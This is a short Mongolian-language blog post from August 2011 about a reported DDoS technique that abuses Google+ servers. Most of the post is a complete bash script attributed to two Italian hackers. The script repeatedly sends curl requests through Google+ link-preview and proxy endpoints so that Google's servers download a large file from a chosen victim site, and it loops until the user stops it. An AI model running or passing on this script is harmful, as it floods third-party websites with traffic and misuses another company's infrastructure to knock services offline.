DDos дайралт ашиглан Google+ сервер рүү довтолжээ.

Posted on
  • Tuesday, August 30, 2011
  • by
  • in
  • Ангилал , , , , , ,
  • Нууцлалт хамгаалалтын нэвтрэлтийг шалгадаг Италийн "AIR Sicurezza Informatica" байгууллага дэлхийн хамгийн том хайлтын систем болох Гүүглийн серверүүд рүү хакерууд DDos дайралт ашиглан ГүүглНэмэхийн серверт довтлогч програм(exploit) ажиллуулж байгаа тухай мэдээлэл хийжээ.
    Мөн өөр нэгэн нууцлал, хамгаалалтын тухай мэдээлэл бичдэг сайтанд Simone Quatrini гэгч хакер залуу Гүүглийн серверлүү DDos дайралт ашиглан хэрхэн довтлох талаар заавар хичээл маягийн юм оруулсан байна.
    Тэрээр үүндээ тухайн дайралт хийх эх кодыг хүртэл хавсаргаж өгөн, видео бичлэгээр үзүүлсэн хичээл оруулжээ.

    Заавар болон эх код:




    Эх код:
    -------------------------------------------------------------------------------------------

    1. #!/bin/bash
    2. #   Bug found by                        #
    3. #       Simone 'R00T_ATI' Quatrini      #
    4. #       Mauro 'epicfail' Gasperini      #
    5. #       Site: http://www.ihteam.net     #
    6. function start {
    7.     echo "[*] Sending `echo $2` Requests..."
    8.    
    9.     for a in `seq $2`
    10.     do
    11.         id=$((RANDOM%3999999+3000000))
    12.         nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    13.         nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    14.     done
    15.     echo "[*] Still attacking `echo $urlclear`"
    16.     echo "[*] Sleeping for 10 Seconds"
    17.     sleep 10
    18.     start url $2 urlclear
    19. }
    20. echo ''
    21. echo '             88888888ba,    88888888ba,                  ad88888ba  '
    22. echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
    23. echo '    88      88        `8b  88        `8b               Y8,          '
    24. echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
    25. echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
    26. echo '    88      88         8P  88         8P  8b       d8          `8b  '
    27. echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
    28. echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
    29. echo ''
    30. if [ "$#" -lt 2 ]; then
    31.     echo "Usage: $0 <big file> <Requests>"
    32.     echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    33.     echo ""
    34.     exit 0                                                                                                                                                                          
    35. fi                                                                                                                                                                                  
    36.                                                                                                                                                                                    
    37. case $2 in                                                                                                                                                                          
    38.     *[!0-9]* )  echo "$2 is not numeric" && exit 1;;                                                                                                                                
    39. esac                                                                                                                                                                                
    40.                                                                                                                                                                                    
    41. echo "Attack -->" $1                                                                                                                                                                
    42. match1=/                                                                                                                                                                            
    43. repl1=%2F                                                                                                                                                                          
    44. match2=:                                                                                                                                                                            
    45. repl2=%3A                                                                                                                                                                          
    46. url=$1                                                                                                                                                                              
    47. urlclear=$1                                                                                                                                                                        
    48.                                                                                                                                                                                    
    49. url=${url//$match1/$repl1}                                                                                                                                                          
    50. url=${url//$match2/$repl2}                                                                                                                                                          
    51.                                                                                                                                                                                    
    52. echo ""                                                                                                                                                                            
    53. echo "[*] Loop started! CTRL+C to stop"                                                                                                                                            
    54. echo ""
    55. start url $2 urlclear

      -----------------------------------------------------------------------------

    0 сэтгэгдэл:

    Post a Comment